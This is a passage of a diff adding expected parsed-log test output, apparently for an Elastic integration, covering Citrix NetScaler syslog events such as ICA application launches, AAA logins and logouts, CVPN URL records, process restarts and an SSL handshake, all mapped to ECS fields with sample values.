] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "source": { + "bytes": 2000 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_LAUNCH 4471 0 : session_guid STU901 - device_serial_number 1007 - client_cookie stu901 - flags 112233 - startup_duration 45 - launch_mechanism 1 - app_launch_time 2023-04-05T12:38:00Z - app_process_id 9876 - app_name ExampleApp - module_path C:/Program Files/ExampleApp", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid STU901 - device_serial_number 1007 - client_cookie stu901 - flags 112233 - startup_duration 45 - launch_mechanism 1 - app_launch_time 2023-04-05T12:38:00Z - app_process_id 9876 - app_name ExampleApp - module_path C:/Program Files/ExampleApp" + }, + "facility": "local0", + "host": "ns1", + "name": "APPLICATION_LAUNCH", + "priority": "info" + }, + "citrix_adc": { + "log": { + "app": { + "launch_time": "2023-04-05T12:38:00Z", + "name": "ExampleApp", + "process_id": 9876 + }, + "client_cookie": "stu901", + "device_serial_number": "1007", + "flags": "112233", + "launch_mechanism": "1", + "message": "session_guid STU901 - device_serial_number 1007 - client_cookie stu901 - flags 112233 - startup_duration 45 - launch_mechanism 1 - app_launch_time 2023-04-05T12:38:00Z - app_process_id 9876 - app_name ExampleApp - module_path C:/Program Files/ExampleApp", + "module_path": "C:/Program Files/ExampleApp", + "session_guid": "STU901", + "startup_duration": 45 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + 
}, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_LAUNCH 4471 0 : session_guid STU901 - device_serial_number 1007 - client_cookie stu901 - flags 112233 - startup_duration 45 - launch_mechanism 1 - app_launch_time 2023-04-05T12:38:00Z - app_process_id 9876 - app_name ExampleApp - module_path C:/Program Files/ExampleApp", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_TERMINATE 4471 0 : session_guid VWX234 - device_serial_number 1008 - client_cookie vwx234 - flags 445566 - app_termination_type 0 - app_process_id 9877 - app_termination_time 2023-04-05T12:39:00Z", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid VWX234 - device_serial_number 1008 - client_cookie vwx234 - flags 445566 - app_termination_type 0 - app_process_id 9877 - app_termination_time 2023-04-05T12:39:00Z" + }, + "facility": "local0", + "host": "ns1", + "name": "APPLICATION_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "app": { + "process_id": 9877, + "termination_time": "2023-04-05T12:39:00Z", + "termination_type": "0" + }, + "client_cookie": "vwx234", + "device_serial_number": "1008", + "flags": "445566", + "message": "session_guid VWX234 - device_serial_number 1008 - client_cookie vwx234 - flags 445566 - app_termination_type 0 - app_process_id 9877 - app_termination_time 2023-04-05T12:39:00Z", + "session_guid": "VWX234" + } + }, + "client": { + "geo": { + "city_name": "London", + 
"continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_TERMINATE 4471 0 : session_guid VWX234 - device_serial_number 1008 - client_cookie vwx234 - flags 445566 - app_termination_type 0 - app_process_id 9877 - app_termination_time 2023-04-05T12:39:00Z", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGIN 4471 0 : User Alice - Client_ip 1.128.0.0 - Nat_ip 1.128.0.0 - Vserver 1.128.0.0:443 - Browser_type \"Firefox\" - Group(s) \"Admin,IT\"", + "device_event_class_id": "AAATM", + "extended": { + "message": "User Alice - Client_ip 1.128.0.0 - Nat_ip 1.128.0.0 - Vserver 1.128.0.0:443 - Browser_type \"Firefox\" - Group(s) \"Admin,IT\"" + }, + "facility": "local0", + "host": "ns1", + "name": "LOGIN", + "priority": "info" + }, + "citrix_adc": { + "log": { + "browser_type": "Firefox", + "client_ip": "1.128.0.0", + "groups": "Admin,IT", + "message": "User Alice - Client_ip 1.128.0.0 - Nat_ip 1.128.0.0 - Vserver 1.128.0.0:443 - Browser_type \"Firefox\" - Group(s) \"Admin,IT\"", + "nat": { + "ip": "1.128.0.0" + }, + "user": "Alice", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + 
"ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGIN 4471 0 : User Alice - Client_ip 1.128.0.0 - Nat_ip 1.128.0.0 - Vserver 1.128.0.0:443 - Browser_type \"Firefox\" - Group(s) \"Admin,IT\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Admin,IT" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0" + ], + "user": [ + "Alice" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "source": { + "nat": { + "ip": "1.128.0.0" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "Alice" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGOUT 4471 0 : User Bob - Client_ip 1.128.0.0 - Nat_ip 10.0.0.2 - Vserver 10.0.0.2:10443 - Start_time \"2023-04-04T08:30:00Z\" - End_time \"2023-04-04T09:30:00Z\" - Duration 00:00:04 - Http_resources_accessed 20 - Total_TCP_connections 50 - Total_policies_allowed 45 - Total_policies_denied 5 - Total_bytes_send 3 - Total_bytes_recv 50 - Total_compressedbytes_send 1 - Total_compressedbytes_recv 500 - Compression_ratio_send 50.00% - Compression_ratio_recv 35.00% - LogoutMethod \"UserInitiated\" - Group(s) \"HR,Finance\"", + "device_event_class_id": "AAATM", + "extended": { + "message": "User Bob - Client_ip 1.128.0.0 - Nat_ip 10.0.0.2 - Vserver 10.0.0.2:10443 - Start_time \"2023-04-04T08:30:00Z\" - End_time \"2023-04-04T09:30:00Z\" - Duration 00:00:04 - Http_resources_accessed 20 - Total_TCP_connections 50 - Total_policies_allowed 45 - Total_policies_denied 5 - Total_bytes_send 3 - Total_bytes_recv 50 - Total_compressedbytes_send 1 - Total_compressedbytes_recv 500 - Compression_ratio_send 50.00% - 
Compression_ratio_recv 35.00% - LogoutMethod \"UserInitiated\" - Group(s) \"HR,Finance\"" + }, + "facility": "local0", + "host": "ns1", + "name": "LOGOUT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "1.128.0.0", + "compression_ratio_recieved": 35.0, + "compression_ratio_send": 50.0, + "duration": "00:00:04", + "end_time": "2023-04-04T09:30:00.000Z", + "groups": "HR,Finance", + "http_resources_accessed": "20", + "logout_method": "UserInitiated", + "message": "User Bob - Client_ip 1.128.0.0 - Nat_ip 10.0.0.2 - Vserver 10.0.0.2:10443 - Start_time \"2023-04-04T08:30:00Z\" - End_time \"2023-04-04T09:30:00Z\" - Duration 00:00:04 - Http_resources_accessed 20 - Total_TCP_connections 50 - Total_policies_allowed 45 - Total_policies_denied 5 - Total_bytes_send 3 - Total_bytes_recv 50 - Total_compressedbytes_send 1 - Total_compressedbytes_recv 500 - Compression_ratio_send 50.00% - Compression_ratio_recv 35.00% - LogoutMethod \"UserInitiated\" - Group(s) \"HR,Finance\"", + "nat": { + "ip": "10.0.0.2" + }, + "start_time": "2023-04-04T08:30:00.000Z", + "total_bytes_received": 50, + "total_bytes_send": 3, + "total_compressed_bytes_recieved": 500, + "total_compressed_bytes_send": 1, + "total_policies_allowed": 45, + "total_policies_denied": 5, + "total_tcp_connections": 50, + "user": "Bob", + "vserver": { + "ip": "10.0.0.2", + "port": 10443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "destination": { + "bytes": 50 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2023-04-04T09:30:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGOUT 4471 0 : User Bob - Client_ip 1.128.0.0 - Nat_ip 10.0.0.2 - Vserver 10.0.0.2:10443 - Start_time \"2023-04-04T08:30:00Z\" - End_time \"2023-04-04T09:30:00Z\" - Duration 00:00:04 - Http_resources_accessed 20 - 
Total_TCP_connections 50 - Total_policies_allowed 45 - Total_policies_denied 5 - Total_bytes_send 3 - Total_bytes_recv 50 - Total_compressedbytes_send 1 - Total_compressedbytes_recv 500 - Compression_ratio_send 50.00% - Compression_ratio_recv 35.00% - LogoutMethod \"UserInitiated\" - Group(s) \"HR,Finance\"", + "severity": 0, + "start": "2023-04-04T08:30:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "HR,Finance" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.0.0.2", + "1.128.0.0" + ], + "user": [ + "Bob" + ] + }, + "server": { + "ip": "10.0.0.2", + "port": 10443 + }, + "source": { + "bytes": 3, + "nat": { + "ip": "10.0.0.2" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "Bob" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"AccessRestriction\"", + "device_event_class_id": "AAATM", + "extended": { + "message": "- Denied_by_policy \"AccessRestriction\"" + }, + "facility": "local0", + "host": "ns1", + "name": "HTTP_RESOURCEACCESS_DENIED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "- Denied_by_policy \"AccessRestriction\"", + "policy_violation": "AccessRestriction" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy 
\"AccessRestriction\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_INPUT_URL 4471 0 : HTML_URL https://example.com/page", + "device_event_class_id": "CVPN", + "extended": { + "message": "HTML_URL https://example.com/page" + }, + "facility": "local0", + "host": "ns1", + "name": "CVPN_INPUT_URL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "html_url": "https://example.com/page", + "message": "HTML_URL https://example.com/page" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_INPUT_URL 4471 0 : HTML_URL https://example.com/page", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "example.com", + "original": "https://example.com/page", + "path": "/page", + "scheme": "https" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_REWRITTEN_URL 4471 0 : REWRITTEN_URL 
https://example.com/proxy?url=page", + "device_event_class_id": "CVPN", + "extended": { + "message": "REWRITTEN_URL https://example.com/proxy?url=page" + }, + "facility": "local0", + "host": "ns1", + "name": "CVPN_REWRITTEN_URL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "REWRITTEN_URL https://example.com/proxy?url=page", + "rewritten_url": "https://example.com/proxy?url=page" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_REWRITTEN_URL 4471 0 : REWRITTEN_URL https://example.com/proxy?url=page", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "example.com", + "original": "https://example.com/proxy?url=page", + "path": "/proxy", + "query": "url=page", + "scheme": "https" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_MATCHED_URL 4471 0 : MATCHED_URL https://example.com/assets/image.jpg", + "device_event_class_id": "CVPN", + "extended": { + "message": "MATCHED_URL https://example.com/assets/image.jpg" + }, + "facility": "local0", + "host": "ns1", + "name": "CVPN_MATCHED_URL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "matched_url": "https://example.com/assets/image.jpg", + "message": "MATCHED_URL 
https://example.com/assets/image.jpg" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_MATCHED_URL 4471 0 : MATCHED_URL https://example.com/assets/image.jpg", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "example.com", + "extension": "jpg", + "original": "https://example.com/assets/image.jpg", + "path": "/assets/image.jpg", + "scheme": "https" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM ACTION_MISMATCH 4471 0 : Client 1.128.0.0 - Profile ThreatPrevention - Action Alert - Value High", + "device_event_class_id": "TRANSFORM", + "extended": { + "message": "Client 1.128.0.0 - Profile ThreatPrevention - Action Alert - Value High" + }, + "facility": "local0", + "host": "ns1", + "name": "ACTION_MISMATCH", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "Alert", + "client_ip": "1.128.0.0", + "message": "Client 1.128.0.0 - Profile ThreatPrevention - Action Alert - Value High", + "profile": "ThreatPrevention", + "value": "High" + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "alert", + "category": [ + 
"network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM ACTION_MISMATCH 4471 0 : Client 1.128.0.0 - Profile ThreatPrevention - Action Alert - Value High", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM PCRE_ERROR 4471 0 : Client 1.128.0.0 - Profile ContentFilter - Action Validate - PCRE error code 5", + "device_event_class_id": "TRANSFORM", + "extended": { + "message": "Client 1.128.0.0 - Profile ContentFilter - Action Validate - PCRE error code 5" + }, + "facility": "local0", + "host": "ns1", + "name": "PCRE_ERROR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "Validate", + "client_ip": "1.128.0.0", + "message": "Client 1.128.0.0 - Profile ContentFilter - Action Validate - PCRE error code 5", + "pcre_error_code": "5", + "profile": "ContentFilter" + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "validate", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM PCRE_ERROR 4471 0 : Client 1.128.0.0 - Profile ContentFilter - Action Validate - PCRE error code 5", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": 
"2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM REQ_WRITE_ERROR 4471 0 : Client 1.128.0.0 - Profile Gateway - Failed to write Location request header", + "device_event_class_id": "TRANSFORM", + "extended": { + "message": "Client 1.128.0.0 - Profile Gateway - Failed to write Location request header" + }, + "facility": "local0", + "host": "ns1", + "name": "REQ_WRITE_ERROR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "1.128.0.0", + "header": "Location", + "message": "Client 1.128.0.0 - Profile Gateway - Failed to write Location request header", + "profile": "Gateway" + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM REQ_WRITE_ERROR 4471 0 : Client 1.128.0.0 - Profile Gateway - Failed to write Location request header", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : BOT BOT_SIG_AUTO_UPDATE 4471 0 : Bot New Signature Available. Newly added Rules: 5 DeletedRules: 2", + "device_event_class_id": "BOT", + "extended": { + "message": "Bot New Signature Available. Newly added Rules: 5 DeletedRules: 2" + }, + "facility": "local0", + "host": "ns1", + "name": "BOT_SIG_AUTO_UPDATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "deleted_rules": 2, + "message": "Bot New Signature Available. 
Newly added Rules: 5 DeletedRules: 2", + "newly_added_rules": 5 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : BOT BOT_SIG_AUTO_UPDATE 4471 0 : Bot New Signature Available. Newly added Rules: 5 DeletedRules: 2", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Adding pitboss watch on (1024)", + "device_event_class_id": "PITBOSS", + "extended": { + "message": "Adding pitboss watch on (1024)" + }, + "facility": "local0", + "host": "ns1", + "name": "PITBOSS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Adding pitboss watch on (1024)", + "watch_id": "1024" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Adding pitboss watch on (1024)", + "severity": 0, + "timezone": "GMT", + 
"type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Deleting watch on (2048)", + "device_event_class_id": "PITBOSS", + "extended": { + "message": "Deleting watch on (2048)" + }, + "facility": "local0", + "host": "ns1", + "name": "PITBOSS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Deleting watch on (2048)", + "watch_id": "2048" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Deleting watch on (2048)", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_SYSTEM_RESTART 4471 0 : proc (4096) (DatabaseService) has had its maximum number of restarts (3), rebooting the system", + "device_event_class_id": "PITBOSS", + "extended": { + "message": "proc (4096) (DatabaseService) has had its maximum number of restarts (3), rebooting the system" + }, + "facility": 
"local0", + "host": "ns1", + "name": "PB_SYSTEM_RESTART", + "priority": "info" + }, + "citrix_adc": { + "log": { + "max_restarts": 3, + "message": "proc (4096) (DatabaseService) has had its maximum number of restarts (3), rebooting the system", + "process": { + "id": 4096, + "name": "DatabaseService" + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_SYSTEM_RESTART 4471 0 : proc (4096) (DatabaseService) has had its maximum number of restarts (3), rebooting the system", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "process": { + "name": "DatabaseService", + "pid": 4096 + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_PROCESS_RESTART 4471 0 : Restarting process old pid (8192) action (respawn)", + "device_event_class_id": "PITBOSS", + "extended": { + "message": "Restarting process old pid (8192) action (respawn)" + }, + "facility": "local0", + "host": "ns1", + "name": "PB_PROCESS_RESTART", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "respawn", + "message": "Restarting process old pid (8192) action (respawn)", + "old_pid": 8192 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": 
"United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "respawn", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_PROCESS_RESTART 4471 0 : Restarting process old pid (8192) action (respawn)", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : SPCBId 3376175 - ClientIP 1.128.0.1 - ClientPort 2357 - VserverServiceIP 1.128.0.2 - VserverServicePort 443 - ClientVersion TLSv1.3 - CipherSuite \"TLS1.3-AES256-GCM-SHA384\" - Session New - HandshakeTime 55 ms", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 3376175 - ClientIP 1.128.0.1 - ClientPort 2357 - VserverServiceIP 1.128.0.2 - VserverServicePort 443 - ClientVersion TLSv1.3 - CipherSuite \"TLS1.3-AES256-GCM-SHA384\" - Session New - HandshakeTime 55 ms" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cipher_suite": "TLS1.3-AES256-GCM-SHA384", + "client_ip": "1.128.0.1", + 